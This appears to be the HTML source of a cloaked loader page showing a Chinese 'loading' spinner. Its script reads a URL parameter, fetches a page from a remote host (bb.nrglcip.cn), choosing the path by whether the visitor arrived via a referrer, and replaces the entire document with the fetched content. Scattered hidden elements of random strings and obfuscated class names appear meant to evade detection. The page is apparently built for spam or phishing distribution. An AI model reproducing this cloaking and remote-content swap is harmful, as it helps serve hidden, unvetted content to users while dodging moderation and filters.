<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DE67dM4p {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DE67dM4p .RSEHPXDErK {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DE67dM4p .content {
            line-height: 50px;
            text-align: center
        }

        .DE67dM4p .img {
            width: 100%
        }

        .DE67dM4p .A8PdkdZ6BdL {
            text-align: center
        }

        .DE67dM4p .A8PdkdZ6BdL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DE67dM4p .A8PdkdZ6BdL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DE67dM4p .A8PdkdZ6BdL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DE67dM4p .A8PdkdZ6BdL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DE67dM4p .A8PdkdZ6BdL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DE67dM4p .A8PdkdZ6BdL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DE67dM4p .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UuRp5nUNCK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dPB0b = UuRp5nUNCK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dPB0b +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dPB0b +".html?a=share";
		}
		
        OHRQ9hf=url+"#"+new Date().getTime();
        OHRQ9hf && function() {
            $.get(OHRQ9hf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >QyFtXQhEgaKDcUroTaiqJzYZ8BGjLISAKi1</li>
<h1 style='display:none' >fnb7ha5z7mxsAtg7HiNGb9yzEYSU6dmMsAlkdBUWdeLpbF34qmCh2tHfY1rCm7efhoKwngCRkW6LP</h1>
<p  style='display:none'>rdacN0bmkCGzi8k5I8pt21Et9I5Acq1ojNkoziPHRyeEMe39q7Nh8Tkn2sT</p>
<div style='display:none'>IZt74835NXyrYS55nQo2KRyGARzU1vvtovYT5zWNZc3X3fGVTQM6REDspPwHcglCdaTXDKjFvcfgf7</div>
<div style='display:none'>IZt74835NXyrYS55nQo2KRyGARzU1vvtovYT5zWNZc3X3fGVTQM6REDspPwHcglCdaTXDKjFvcfgf7</div>
<h1 style='display:none' >fnb7ha5z7mxsAtg7HiNGb9yzEYSU6dmMsAlkdBUWdeLpbF34qmCh2tHfY1rCm7efhoKwngCRkW6LP</h1>
<ul style='display:none' >jkud8SjZpvNm5rbleWaxDO7J4FyG0ELbwNNG9LaNB9rV8oD6dv3F7arU6JoXMGngfK94rRM7</ul>
<li style='display:none' >QyFtXQhEgaKDcUroTaiqJzYZ8BGjLISAKi1</li>
<li style='display:none' >QyFtXQhEgaKDcUroTaiqJzYZ8BGjLISAKi1</li>
<h1 style='display:none' >fnb7ha5z7mxsAtg7HiNGb9yzEYSU6dmMsAlkdBUWdeLpbF34qmCh2tHfY1rCm7efhoKwngCRkW6LP</h1><div class="DE67dM4p">
    <div class="RSEHPXDErK">
        <div class="A8PdkdZ6BdL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>uELAUNqvHqgYfomyx0AHuaXPTvB4nBsmBEBuBgaZ823</p>
<p  style='display:none'>uELAUNqvHqgYfomyx0AHuaXPTvB4nBsmBEBuBgaZ823</p>
<a  href='#' style='display:none'>wrGJMb67cfIVenDfyvkGrqWB9q</a>
<p  style='display:none'>uELAUNqvHqgYfomyx0AHuaXPTvB4nBsmBEBuBgaZ823</p>
<span style='display:none'>HT03cw7mYIUSpxEI2DO0kRPthUQ5iSD9i0Kb2mLOTyJ8fJ2QGuZKuvVVtg5RybIWi6ubSP9tvzwUu7hyZ9tC9m</span>
<b style='display:none' >xyCJgXhDZyQdn7mdRgULRN7urMJG2KHdkFLg0Z2hpba7</b>
<b style='display:none' >xyCJgXhDZyQdn7mdRgULRN7urMJG2KHdkFLg0Z2hpba7</b>
<div style='display:none'>haUmJ3YVZzJqyU8lt</div></body>
</html>